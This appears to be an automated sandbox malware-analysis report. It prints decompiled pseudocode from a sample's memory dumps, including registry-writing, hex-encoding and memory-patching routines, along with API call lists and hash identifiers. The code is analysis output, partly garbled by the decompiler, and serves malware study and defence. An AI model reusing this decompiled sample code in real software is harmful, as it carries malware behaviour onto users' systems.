                                                                                                                                                                                                                                                                          0x040072bd
                                                                                                                                                                                                                                                                          0x040072c3
                                                                                                                                                                                                                                                                          0x040072c6
                                                                                                                                                                                                                                                                          0x040072d6
                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                          0x040072df
                                                                                                                                                                                                                                                                          0x04007301
                                                                                                                                                                                                                                                                          0x04007307
                                                                                                                                                                                                                                                                          0x0400730e
                                                                                                                                                                                                                                                                          0x04007331
                                                                                                                                                                                                                                                                          0x0400733c
                                                                                                                                                                                                                                                                          0x04007343
                                                                                                                                                                                                                                                                          0x04007349
                                                                                                                                                                                                                                                                          0x0400734c
                                                                                                                                                                                                                                                                          0x0400734f
                                                                                                                                                                                                                                                                          0x04007353
                                                                                                                                                                                                                                                                          0x04007358
                                                                                                                                                                                                                                                                          0x0400735e
                                                                                                                                                                                                                                                                          0x04007364
                                                                                                                                                                                                                                                                          0x0400736a
                                                                                                                                                                                                                                                                          0x0400736f
                                                                                                                                                                                                                                                                          0x04007374
                                                                                                                                                                                                                                                                          0x0400737a
                                                                                                                                                                                                                                                                          0x04007380
                                                                                                                                                                                                                                                                          0x04007383
                                                                                                                                                                                                                                                                          0x0400738b
                                                                                                                                                                                                                                                                          0x04007393
                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007301

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040072BD
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 040072F9
                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 04007329
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007343
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 040073A9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                          • Opcode ID: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                          • Instruction ID: 1589668eb117d9c12aae7036857c9bc1fd79cd220dc98d09134ced9bc9b72130
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE414C74900208EFEB08DF94D885BEDBBB5FF48300F14C569E915AB281D779AA45CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040073C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_t24 = _a4;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          						_v20 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                          						_t26 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          						_v8 = _t26;
                                                                                                                                                                                                                                                                          						E04007D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                          						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                          						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          						if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                          						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                          						if(_t24 == 0) {
                                                                                                                                                                                                                                                                          							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                          							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                          							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                          0x040073ca
                                                                                                                                                                                                                                                                          0x040073e4
                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                          0x04007401
                                                                                                                                                                                                                                                                          0x04007404
                                                                                                                                                                                                                                                                          0x04007409
                                                                                                                                                                                                                                                                          0x04007414
                                                                                                                                                                                                                                                                          0x04007429
                                                                                                                                                                                                                                                                          0x04007432
                                                                                                                                                                                                                                                                          0x04007442
                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                          0x0400744b
                                                                                                                                                                                                                                                                          0x04007465
                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                          0x04007473
                                                                                                                                                                                                                                                                          0x0400748b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007495
                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                          0x0400749e

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 04007429
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 04007465
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007473
                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400748B
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007495
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                          • Instruction ID: 829c9f2afe597629132b3bb77bbcf1684e2940429f06bc569247a29e29dd4590
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 442112B5900208ABEB14DFA4D849FFE77B8FB48704F048558FA15AB180D77DAA44CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04009650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				signed char _v25;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                          						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                          						E04007D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                          						E04009560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                          						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                          						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                          						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                          						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04009656
                                                                                                                                                                                                                                                                          0x04009661
                                                                                                                                                                                                                                                                          0x04009685
                                                                                                                                                                                                                                                                          0x04009696
                                                                                                                                                                                                                                                                          0x04009699
                                                                                                                                                                                                                                                                          0x040096b1
                                                                                                                                                                                                                                                                          0x040096bc
                                                                                                                                                                                                                                                                          0x040096cf
                                                                                                                                                                                                                                                                          0x040096d4
                                                                                                                                                                                                                                                                          0x040096df
                                                                                                                                                                                                                                                                          0x040096ef
                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                          0x0400970a
                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                          0x04009728

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009690
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 040096DF
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 040096E9
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009701
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009719
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                          • Instruction ID: 5d62f8ff5c671b513c9f4ed5768570a6b0eac4432c67e9f412687076ede29f23
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D213DB1900349EFEB14CFA4D884BEE7BB5FF44305F148558E914A7281D378AA94CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                                                                          			E00401E1C(void* __eax, void* __ebx, int __ecx, void* __edx, intOrPtr __edi, void* __esi) {
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				char* _v60;
                                                                                                                                                                                                                                                                          				int _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				void* _v84;
                                                                                                                                                                                                                                                                          				char** _v88;
                                                                                                                                                                                                                                                                          				signed int _v148;
                                                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                                                          				long _t57;
                                                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                                                          				signed char* _t70;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                          				intOrPtr* _t87;
                                                                                                                                                                                                                                                                          				intOrPtr* _t89;
                                                                                                                                                                                                                                                                          				int _t94;
                                                                                                                                                                                                                                                                          				intOrPtr _t96;
                                                                                                                                                                                                                                                                          				signed int _t112;
                                                                                                                                                                                                                                                                          				void** _t120;
                                                                                                                                                                                                                                                                          				intOrPtr _t121;
                                                                                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                          				char _t145;
                                                                                                                                                                                                                                                                          				char** _t150;
                                                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                                                          				intOrPtr* _t153;
                                                                                                                                                                                                                                                                          				char** _t154;
                                                                                                                                                                                                                                                                          				char** _t155;
                                                                                                                                                                                                                                                                          				char** _t162;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t122 = __edi;
                                                                                                                                                                                                                                                                          				_t106 = __edx;
                                                                                                                                                                                                                                                                          				_t55 = __eax;
                                                                                                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                                                                                                          				_t153 = _t152 - 0x4c;
                                                                                                                                                                                                                                                                          				_t85 = __eax;
                                                                                                                                                                                                                                                                          				_t141 = __edx;
                                                                                                                                                                                                                                                                          				if(__ecx != 0) {
                                                                                                                                                                                                                                                                          					_v84 = 0x1c;
                                                                                                                                                                                                                                                                          					_v88 =  &_v60;
                                                                                                                                                                                                                                                                          					 *_t153 = __eax;
                                                                                                                                                                                                                                                                          					_v64 = __ecx;
                                                                                                                                                                                                                                                                          					_t57 = VirtualQuery(??, ??, ??);
                                                                                                                                                                                                                                                                          					_t154 = _t153 - 0xc;
                                                                                                                                                                                                                                                                          					_t94 = _v64;
                                                                                                                                                                                                                                                                          					if(_t57 == 0) {
                                                                                                                                                                                                                                                                          						_v84 = _t85;
                                                                                                                                                                                                                                                                          						_v88 = 0x1c;
                                                                                                                                                                                                                                                                          						 *_t154 = "  VirtualQuery failed for %d bytes at address %p";
                                                                                                                                                                                                                                                                          						E00401DD0(_t85, _t94, _t106, __edi, _t141);
                                                                                                                                                                                                                                                                          						_t150 = _t154;
                                                                                                                                                                                                                                                                          						_push(__edi);
                                                                                                                                                                                                                                                                          						_push(_t141);
                                                                                                                                                                                                                                                                          						_push(_t85);
                                                                                                                                                                                                                                                                          						_t155 = _t154 - 0x2c;
                                                                                                                                                                                                                                                                          						_t59 =  *0x405040;
                                                                                                                                                                                                                                                                          						if(_t59 == 0) {
                                                                                                                                                                                                                                                                          							 *0x405040 = 1;
                                                                                                                                                                                                                                                                          							_t59 = 0;
                                                                                                                                                                                                                                                                          							if(0x404138 <= 7) {
                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_t87 = 0x404138;
                                                                                                                                                                                                                                                                          								if(0x404138 <= 0xb) {
                                                                                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                                                                                          									_t106 =  *_t87;
                                                                                                                                                                                                                                                                          									if( *_t87 != 0) {
                                                                                                                                                                                                                                                                          										goto L17;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_t32 = _t87 + 4; // 0x0
                                                                                                                                                                                                                                                                          										_t59 =  *_t32;
                                                                                                                                                                                                                                                                          										if(_t59 != 0) {
                                                                                                                                                                                                                                                                          											goto L17;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											goto L25;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_t122 =  *0x404138; // 0x0
                                                                                                                                                                                                                                                                          									if(_t122 != 0) {
                                                                                                                                                                                                                                                                          										L17:
                                                                                                                                                                                                                                                                          										if(_t87 >= 0x404138) {
                                                                                                                                                                                                                                                                          											goto L11;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											do {
                                                                                                                                                                                                                                                                          												_t30 = _t87 + 4; // 0x0
                                                                                                                                                                                                                                                                          												_v40 =  *((intOrPtr*)( *_t30 + 0x400000)) +  *_t87;
                                                                                                                                                                                                                                                                          												_t63 = E00401E1C( *_t30 + 0x400000, _t87, 4,  &_v40,  &_v40, 0x400000);
                                                                                                                                                                                                                                                                          												_t87 = _t87 + 8;
                                                                                                                                                                                                                                                                          											} while (_t87 < 0x404138);
                                                                                                                                                                                                                                                                          											return _t63;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_t141 =  *0x40413c; // 0x0
                                                                                                                                                                                                                                                                          										if(_t141 == 0) {
                                                                                                                                                                                                                                                                          											_t94 =  *0x404140; // 0x0
                                                                                                                                                                                                                                                                          											if(_t94 != 0) {
                                                                                                                                                                                                                                                                          												L25:
                                                                                                                                                                                                                                                                          												_t33 = _t87 + 8; // 0x0
                                                                                                                                                                                                                                                                          												_t59 =  *_t33;
                                                                                                                                                                                                                                                                          												if(_t59 != 1) {
                                                                                                                                                                                                                                                                          													_v148 = _t59;
                                                                                                                                                                                                                                                                          													 *_t155 = "  Unknown pseudo relocation protocol version %d.\n";
                                                                                                                                                                                                                                                                          													E00401DD0(_t87, _t94, _t106, _t122, _t141);
                                                                                                                                                                                                                                                                          													_push(_t150);
                                                                                                                                                                                                                                                                          													_t66 =  *((intOrPtr*)( *0x403020));
                                                                                                                                                                                                                                                                          													while(_t66 != 0) {
                                                                                                                                                                                                                                                                          														 *_t66();
                                                                                                                                                                                                                                                                          														_t68 =  *0x403020;
                                                                                                                                                                                                                                                                          														 *0x403020 = _t68 + 4;
                                                                                                                                                                                                                                                                          														_t66 =  *((intOrPtr*)(_t68 + 4));
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													return _t66;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													_t89 = _t87 + 0xc;
                                                                                                                                                                                                                                                                          													if(_t89 < 0x404138) {
                                                                                                                                                                                                                                                                          														do {
                                                                                                                                                                                                                                                                          															_t34 = _t89 + 4; // 0x0
                                                                                                                                                                                                                                                                          															_t70 = 0x400000 +  *_t34;
                                                                                                                                                                                                                                                                          															_t96 =  *_t89;
                                                                                                                                                                                                                                                                          															_t35 = _t96 + 0x400000; // 0x905a4d
                                                                                                                                                                                                                                                                          															_t145 =  *_t35;
                                                                                                                                                                                                                                                                          															_t36 = _t89 + 8; // 0x0
                                                                                                                                                                                                                                                                          															_t112 =  *_t36 & 0x000000ff;
                                                                                                                                                                                                                                                                          															if(_t112 == 0x10) {
                                                                                                                                                                                                                                                                          																_t126 =  *0x400000 & 0x0000ffff;
                                                                                                                                                                                                                                                                          																if((_t126 & 0x00008000) != 0) {
                                                                                                                                                                                                                                                                          																	_t122 = (_t126 | 0xffff0000) - _t96 - 0x400000;
                                                                                                                                                                                                                                                                          																	_v36 = _t145;
                                                                                                                                                                                                                                                                          																	goto L43;
                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                          																	goto L34;
                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                          																if(_t112 == 0x20) {
                                                                                                                                                                                                                                                                          																	_v36 =  *0x400000 - _t96 - 0x400000 + _t145;
                                                                                                                                                                                                                                                                          																	goto L39;
                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                          																	if(_t112 != 8) {
                                                                                                                                                                                                                                                                          																		_v36 = 0;
                                                                                                                                                                                                                                                                          																		_v148 = _t112;
                                                                                                                                                                                                                                                                          																		 *_t155 = "  Unknown pseudo relocation bit size %d.\n";
                                                                                                                                                                                                                                                                          																		_t70 = E00401DD0(_t89, _t96, _t112, _t122, _t145);
                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                          																	_t126 =  *_t70 & 0x000000ff;
                                                                                                                                                                                                                                                                          																	if((_t126 & 0x00000080) == 0) {
                                                                                                                                                                                                                                                                          																		L34:
                                                                                                                                                                                                                                                                          																		_t122 = _t126 - _t96;
                                                                                                                                                                                                                                                                          																		_v36 = _t126 - _t96 - 0x400000 + _t145;
                                                                                                                                                                                                                                                                          																		if(_t112 == 0x10) {
                                                                                                                                                                                                                                                                          																			L43:
                                                                                                                                                                                                                                                                          																			E00401E1C(_t70, _t89, 2,  &_v36, _t122, _t145);
                                                                                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                                                                                          																			if(_t112 == 0x20) {
                                                                                                                                                                                                                                                                          																				L39:
                                                                                                                                                                                                                                                                          																				E00401E1C(_t70, _t89, 4,  &_v36, _t122, _t145);
                                                                                                                                                                                                                                                                          																			} else {
                                                                                                                                                                                                                                                                          																				if(_t112 == 8) {
                                                                                                                                                                                                                                                                          																					goto L37;
                                                                                                                                                                                                                                                                          																				}
                                                                                                                                                                                                                                                                          																			}
                                                                                                                                                                                                                                                                          																		}
                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                          																		_t122 = (_t126 | 0xffffff00) - _t96 - 0x400000;
                                                                                                                                                                                                                                                                          																		_v36 = _t145;
                                                                                                                                                                                                                                                                          																		L37:
                                                                                                                                                                                                                                                                          																		E00401E1C(_t70, _t89, 1,  &_v36, _t122, _t145);
                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_t89 = _t89 + 0xc;
                                                                                                                                                                                                                                                                          															_t59 = 0x404138;
                                                                                                                                                                                                                                                                          														} while (0x404138 > _t89);
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													goto L11;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                          												_t87 = 0x404144;
                                                                                                                                                                                                                                                                          												goto L23;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											goto L17;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                          							return _t59;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t74 = _v40;
                                                                                                                                                                                                                                                                          						if(_t74 == 0x40 || _t74 == 4) {
                                                                                                                                                                                                                                                                          							return memcpy(_t85, _t141, _t94);
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_t120 =  &_v32;
                                                                                                                                                                                                                                                                          							_v80 = _t120;
                                                                                                                                                                                                                                                                          							_v84 = 0x40;
                                                                                                                                                                                                                                                                          							_v88 = _v48;
                                                                                                                                                                                                                                                                          							 *_t154 = _v60;
                                                                                                                                                                                                                                                                          							_v68 = _t120;
                                                                                                                                                                                                                                                                          							_v64 = _t94;
                                                                                                                                                                                                                                                                          							VirtualProtect(??, ??, ??, ??);
                                                                                                                                                                                                                                                                          							_t55 = memcpy(_t85, _t141, _v64);
                                                                                                                                                                                                                                                                          							_t162 = _t154 - 0x10 + 0xc;
                                                                                                                                                                                                                                                                          							_t121 = _v68;
                                                                                                                                                                                                                                                                          							if(_t55 == 0x40 || _t55 == 4) {
                                                                                                                                                                                                                                                                          								goto L1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v80 = _t121;
                                                                                                                                                                                                                                                                          								_v84 = _v32;
                                                                                                                                                                                                                                                                          								_v88 = _v48;
                                                                                                                                                                                                                                                                          								 *_t162 = _v60;
                                                                                                                                                                                                                                                                          								return VirtualProtect(??, ??, ??, ??);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                                                                                          					return _t55;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}








































                                                                                                                                                                                                                                                                          0x00401e1c
                                                                                                                                                                                                                                                                          0x00401e1c
                                                                                                                                                                                                                                                                          0x00401e1c
                                                                                                                                                                                                                                                                          0x00401e1f
                                                                                                                                                                                                                                                                          0x00401e20
                                                                                                                                                                                                                                                                          0x00401e21
                                                                                                                                                                                                                                                                          0x00401e22
                                                                                                                                                                                                                                                                          0x00401e25
                                                                                                                                                                                                                                                                          0x00401e27
                                                                                                                                                                                                                                                                          0x00401e2b
                                                                                                                                                                                                                                                                          0x00401e38
                                                                                                                                                                                                                                                                          0x00401e43
                                                                                                                                                                                                                                                                          0x00401e47
                                                                                                                                                                                                                                                                          0x00401e4a
                                                                                                                                                                                                                                                                          0x00401e4d
                                                                                                                                                                                                                                                                          0x00401e52
                                                                                                                                                                                                                                                                          0x00401e57
                                                                                                                                                                                                                                                                          0x00401e5a
                                                                                                                                                                                                                                                                          0x00401ee8
                                                                                                                                                                                                                                                                          0x00401eec
                                                                                                                                                                                                                                                                          0x00401ef4
                                                                                                                                                                                                                                                                          0x00401efb
                                                                                                                                                                                                                                                                          0x00401f01
                                                                                                                                                                                                                                                                          0x00401f03
                                                                                                                                                                                                                                                                          0x00401f04
                                                                                                                                                                                                                                                                          0x00401f05
                                                                                                                                                                                                                                                                          0x00401f06
                                                                                                                                                                                                                                                                          0x00401f09
                                                                                                                                                                                                                                                                          0x00401f10
                                                                                                                                                                                                                                                                          0x00401f1c
                                                                                                                                                                                                                                                                          0x00401f2b
                                                                                                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401f35
                                                                                                                                                                                                                                                                          0x00401f35
                                                                                                                                                                                                                                                                          0x00401f3d
                                                                                                                                                                                                                                                                          0x00401fa0
                                                                                                                                                                                                                                                                          0x00401fa0
                                                                                                                                                                                                                                                                          0x00401fa4
